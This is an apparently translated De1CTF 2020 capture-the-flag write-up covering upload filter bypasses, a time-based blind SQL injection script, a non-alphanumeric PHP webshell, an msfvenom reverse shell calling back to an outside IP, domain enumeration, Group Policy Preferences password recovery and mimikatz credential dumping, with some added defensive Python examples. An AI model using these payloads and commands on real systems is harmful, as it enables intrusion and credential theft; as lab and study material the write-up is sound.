De1CTF2020 writeup

Yet another soul-crushing competition... my teammates are way too strong (tql).

checkin

Filenames such as .php cannot be uploaded, and the file content is filtered:

perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!

.htaccess:

AddType application/x-httpd-p\
hp .xxx

a.xxx:

<?=`cat /flag`;
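Why this .htaccess gets past the content filter, and what the filter would have to do to catch it: the blacklist is matched against the raw upload, while Apache joins a trailing backslash with the following line before it reads the directive. The following is an added example, not code from the writeup or the challenge; it transcribes the filter string quoted above and applies it to the content both raw and in the form Apache actually parses.

```python
import re

# The fragment blacklist the upload handler reports (copied from the challenge's error message).
BLACKLIST = re.compile(
    r"perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet", re.I
)

# Constructed .htaccess body with the same shape as the one used in the writeup.
HTACCESS = "AddType application/x-httpd-p\\\nhp .xxx\n"


def join_continuations(text):
    """Join backslash-newline continuations the way Apache's config reader does.

    Apache treats a trailing backslash as 'this directive continues on the next
    line', so the physical lines 'x-httpd-p\\' and 'hp .xxx' become one logical
    line that contains 'php'.
    """
    return re.sub(r"\\\r?\n", "", text)


def filter_hits(text):
    """Return the blacklisted fragments present in text, sorted; an empty list
    means the upload filter lets the content through."""
    return sorted({m.group(0).lower() for m in BLACKLIST.finditer(text)})


def audit(text):
    """Apply the blacklist to the raw bytes (what the challenge did) and to the
    joined form Apache will parse (what a correct filter must check)."""
    return {"raw": filter_hits(text), "apache_view": filter_hits(join_continuations(text))}


if __name__ == "__main__":
    print(audit(HTACCESS))  # {'raw': [], 'apache_view': ['ph']}
```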

Initially, though, directory scanning found a /cgi-bin/ directory, and phpinfo showed that CGI was enabled;

searching turned up a related exploitation technique:

https://www.cnblogs.com/linuxsec/articles/11872187.html

but it returned 500 as soon as I tried it...

mixture

Blind injection through orderby; script:

import requests
import time

url = 'http://134.175.185.244/member.php?orderby='
flag = ''
# MID() positions are 1-based, so start probing at character 1.
for i in range(1, 50):
    for j in range(33, 128):
        print(j)
        # payload = "and(ELT(ord(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),{},1))={},benchmark(200000,sha(1))))".format(i, j)
        payload = "and(ELT(ord(mid((select password from member where username='admin'),{},1))={},benchmark(200000,sha(1))))".format(i, j)

        try:
            # time.sleep(1)
            res = requests.get(url + payload, timeout=6).text
        except requests.RequestException:
            # A timeout means the ELT() condition held and benchmark() ran: this is the character.
            flag += chr(j)
            print(flag)
            break

Cracking the MD5 hash gives the password:

goodlucktoyou

After logging in, phpinfo can be viewed and files can be read. Key code of member.php:

<?php

$orderby = $_GET['orderby'];
if(!empty($orderby)){
    $blacklist = "/if|desc|sleep|rand|updatexml|\^|union|\|\||&&|regexp|exp|extractvalue|length|hex/i";
    if(preg_match($blacklist, $orderby))
        exit("No~~hacker!");
    $sql = "SELECT * FROM users order by id ".$orderby;
    $result = $mysqli->query($sql);
    if($result===false){
        $sql="SELECT * FROM users";
    }
}
else{
    $sql = "SELECT * FROM users";
}
$result = $mysqli->query($sql);
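The blacklist in member.php is why the time-based probe above works: it rejects substrings, so anything assembled from ELT/ORD/MID/BENCHMARK passes, while a legitimate "desc" is blocked. The following is an added example, not code from the challenge, that transcribes the blacklist to Python and places it beside an allowlist check in which nothing from the request is ever concatenated into SQL; the column names are an assumption, since the page does not show the users table.

```python
import re
from typing import Optional

# The blacklist from member.php, transcribed to Python (same pattern, same /i flag).
BLACKLIST = re.compile(
    r"if|desc|sleep|rand|updatexml|\^|union|\|\||&&|regexp|exp|extractvalue|length|hex",
    re.I,
)

# Allowlist alternative. The column names are assumed for this example.
ALLOWED_COLUMNS = {"id", "username", "email"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

# The time-based probe from the writeup's script, with position 1 and byte 97 filled in.
PROBE = ("and(ELT(ord(mid((select password from member where username='admin'),1,1))"
         "=97,benchmark(200000,sha(1))))")


def blacklist_allows(orderby: str) -> bool:
    """Mirror of the page's preg_match check: True means the raw value is
    concatenated into the query."""
    return BLACKLIST.search(orderby) is None


def build_order_by(orderby: str) -> Optional[str]:
    """Return a query whose ORDER BY is built only from allowlisted tokens, or None.

    Only the validated column name and direction reach the SQL string, so there
    is no request substring left for a filter to miss.
    """
    parts = orderby.strip().split()
    if not 1 <= len(parts) <= 2:
        return None
    column = parts[0].lower()
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        return None
    return "SELECT * FROM users ORDER BY `{}` {}".format(column, direction)


if __name__ == "__main__":
    print(blacklist_allows(PROBE), build_order_by(PROBE))          # True None
    print(blacklist_allows("username desc"), build_order_by("username desc"))
```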

Key code of select.php:

if($_SESSION['admin']==1&&!empty($search)){
    //var_dump(urldecode($search));
    Minclude(urldecode($search));
    //lookup($search);
}

Read the configuration file:

/usr/local/etc/php/php.ini 

The last line yields:

extension=/usr/local/lib/php/extensions/no-debug-non-zts-20170718/Minclude.so

And then... PWN!

Hard_Pentest_1

File upload; key filter code:

if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  &&
   !in_array($exts, $BlackExts) &&
   !preg_match('/\.\./',$_FILES["file"]["name"])) {
    return true;
}

The challenge runs on Windows with PHP 7.2. The extension check can be bypassed with uppercase letters, the content may not contain a semicolon, and short tags are available; see p神's article:

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

Construct:

$_POST[_]($_POST[__])

i.e.:

<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$_++?><?=$__=$_?><?=$_++?><?=$___=$_?><?=$_++?><?=$_++?><?=$_++?><?=$____=$_?><?=$_++?><?=$_____=$_?><?=$_=${'_'.$___.$__.$____.$_____}[_]?><?=$_(${'_'.$___.$__.$____.$_____}[__])?>

Then write a one-line webshell so AntSword (蚁剑) can connect:

_=system&__=echo "<?php eval($_POST[1])?>" > ggg.php

The flag is not on the web server, so pivot into the internal network.

Check the IP configuration with ipconfig:

IPv4 Address. . . . . . . . . . . : 192.168.0.11

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.0.253

Check system information with systeminfo:

OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
Domain:                    De1CTF2020.lab
Logon Server:              N/A

net time /domain:

Current time at \\dc.De1CTF2020.lab is 5/2/2020 8:26:14 PM

This shows that a domain exists and the current user is a domain user.

Upload nbtscan and scan the internal network:

nbtscan-1.0.35.exe 192.168.0.0/24

192.168.0.11    DE1CTF2020\DM                   SHARING
192.168.0.12    DE1CTF2020\DC                   SHARING

So 192.168.0.12 is the domain controller.

List all domain users:

C:\web\uploads\eafe07250c2680e6a1c3547649b426b6>net user /domain
net user /domain
The request will be processed at a domain controller for domain De1CTF2020.lab.

User accounts for \\dc.De1CTF2020.lab

-------------------------------------------------------------------------------
Administrator            De1ta                    Guest                    
HintZip_Pass             krbtgt                   web                      
The command completed successfully.

Because the AntSword shell misbehaved in places, I used MSF to generate a reverse shell instead. First generate the shell file:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=62.234.60.226 LPORT=12345  -f  exe  -o shell.exe

Upload the generated shell.exe to the target as g.exe, then start msf:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 12345
exploit

Then run g.exe on the target to get a shell.

Check the server username:

meterpreter > getuid

Use the target's cmd (exit returns to meterpreter):

meterpreter > shell

Check IPC connections:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>net use
net use
New connections will be remembered.

Status       Local     Remote                    Network

-------------------------------------------------------------------------------
OK                     \\192.168.0.12\IPC$       Microsoft Windows Network
The command completed successfully.

Check which shares the domain controller exposes:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>net view \\dc.De1CTF2020.lab
net view \\dc.De1CTF2020.lab
Shared resources at \\dc.De1CTF2020.lab

Share name  Type  Used as  Comment              

-------------------------------------------------------------------------------
Hint        Disk                                
NETLOGON    Disk           Logon server share   
SYSVOL      Disk           Logon server share   
The command completed successfully.

Change the working directory to the Hint share on the domain controller (popd to change back):

pushd \\dc.De1CTF2020.lab\Hint

List the files:

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 30B1-A1C0

 Directory of Z:\

04/17/2020  11:26 AM    <DIR>          .
04/17/2020  11:26 AM    <DIR>          ..
04/17/2020  11:26 AM               528 flag1_and_flag2hint.zip
               1 File(s)            528 bytes
               2 Dir(s)  29,204,348,928 bytes free

Copy this zip file to the web server:

Z:\>copy fl* C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde\aaa.zip

Switch back to meterpreter and download the file locally (upload works for the other direction):

meterpreter > download C:\\web\\uploads\\5fb7ef1b5925b3f12f0c2a5c8739bcde\\aaa.zip

Next, attack GPP:

Group Policy Preferences (GPP) use Group Policy Objects (GPOs) to manage every resource in the domain, which greatly simplifies administration. GPP has one particular feature, however: it can designate a domain account as the local administrator account on every computer in the domain. Why would anyone use this? Perhaps they want to add a new administrator on all machines, or perhaps they want to update a local account's password on every host. Once an administrator pushes such a change through a GPO, every workstation receives that account. In a GPP domain environment the account's details are stored in the domain itself, and every AD user can read them. All account information published through GPP is stored under \\[Domain Controller]\SYSVOL\[Domain]\Policies; the Groups.xml file there holds the encrypted cpassword value.

Related articles:

https://www.freebuf.com/vuls/92016.html
https://www.anquanke.com/post/id/92646

Search:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>dir /s /a \\192.168.0.12\SYSVOL\*.xml
dir /s /a \\192.168.0.12\SYSVOL\*.xml
 Volume in drive \\192.168.0.12\SYSVOL has no label.
 Volume Serial Number is 30B1-A1C0

 Directory of \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups

04/15/2020  10:43 PM               478 Groups.xml
               1 File(s)            478 bytes

     Total Files Listed:
               1 File(s)            478 bytes
               0 Dir(s)  29,202,460,672 bytes free

View its contents:

C:\web\uploads\5fb7ef1b5925b3f12f0c2a5c8739bcde>type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
type \\192.168.0.12\SYSVOL\De1CTF2020.lab\Policies\{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}\Machine\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>

The cpassword value is encrypted with AES, and Microsoft has published the symmetric AES key. With the key known, the local administrator password stored in GPP can be decrypted.

Decrypt the GPP password:

https://github.com/lucasko/gpp-encrypt-decrypt/edit/master/Gpprefdecrypt.py
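The check a defender would run against the same share: walk a copy of SYSVOL for the Group Policy Preferences XML files that can carry a cpassword attribute and report every hit, because with the key public any readable cpassword is an exposed credential. The following is an added example, not part of the writeup or the linked tool; it builds a constructed SYSVOL tree in a temp directory that mirrors the layout dumped above, with a placeholder in place of the real blob.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that may carry a cpassword attribute (the MS14-025 family).
GPP_FILES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed Groups.xml with the same element layout as the one dumped above;
# the cpassword is a placeholder, not a real GPP blob.
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" '
    'changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}">'
    '<Properties action="U" newName="" fullName="" description="" '
    'cpassword="PLACEHOLDER_BLOB" changeLogon="1" noChange="0" neverExpires="0" '
    'acctDisabled="0" userName="HintZip_Pass"/></User>\n</Groups>\n'
)


def find_cpasswords(sysvol_root):
    """Return (file path, account, cpassword) for each non-empty cpassword under sysvol_root.
    Every hit is a finding: the published AES key means the blob decrypts for anyone
    who can read the share, which in a default domain is every authenticated user."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # unparsable preference file: skipped here, log it in a real audit
            for elem in root.iter():
                blob = elem.get("cpassword")
                if blob:  # attribute present and non-empty
                    # Groups.xml names the account in userName; ScheduledTasks.xml uses runAs.
                    account = elem.get("userName") or elem.get("runAs") or "<unknown>"
                    findings.append((path, account, blob))
    return findings


def build_sample_sysvol():
    """Create a temp tree shaped like SYSVOL\\<domain>\\Policies\\{GUID}\\Machine\\Preferences\\Groups."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpo = os.path.join(root, "De1CTF2020.lab", "Policies", "{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}",
                       "Machine", "Preferences", "Groups")
    os.makedirs(gpo)
    with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return root
```

Run `find_cpasswords(build_sample_sysvol())` to see the single finding for HintZip_Pass; against a real domain, point it at a read-only copy of \\dc\SYSVOL.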

The zip contents are:

flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.

Actually msf has a built-in GPP module that does all of this in one go:

use post/windows/gather/credentials/gpp

(background sends the current session to the background.)

Other useful commands:

1. List all sessions:

sessions

Interact with session 1:

sessions -i 1

2. Use mimikatz:

load mimikatz

Get hashes:

msv

Get plaintext credentials:

ssp

Read plaintext account passwords held in memory:

wdigest
tspkg

Run a custom command:

mimikatz_command -f xxx

Hard_Pentest_2

Use msf's built-in Windows-Exploit-Suggester:

use post/multi/recon/local_exploit_suggester
set session 1
exploit

None of the listed exploits worked.

W&M's writeup (tql):

https://mp.weixin.qq.com/s?__biz=MzIxMDYyNTk3Nw==&mid=2247484747&idx=1&sn=2de314ca00d03e015d77a012b9e53757&chksm=9760f19da017788b250fd1b82d47c439c0d63a50d3f8a682187d4d363100e0c2f8489881c228&mpshare=1&scene=23&srcid=&sharer_sharetime=1588730074125&sharer_shareid=4a10c7a3217b7d523bf5792d7f0ca071#rd

Oh well, I still know too little about this area; I'll study it and come back to it later, sob.

Related articles on domain penetration testing:

https://3gstudent.github.io/3gstudent.github.io/Windows%E6%9C%AC%E5%9C%B0%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7Juicy-Potato%E6%B5%8B%E8%AF%95%E5%88%86%E6%9E%90/

https://wh0ale.github.io/2018/12/25/2018-12-25-%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E7%A5%A8%E6%8D%AE/

https://www.cnblogs.com/artech/archive/2007/07/05/807492.html

https://www.anquanke.com/post/id/92646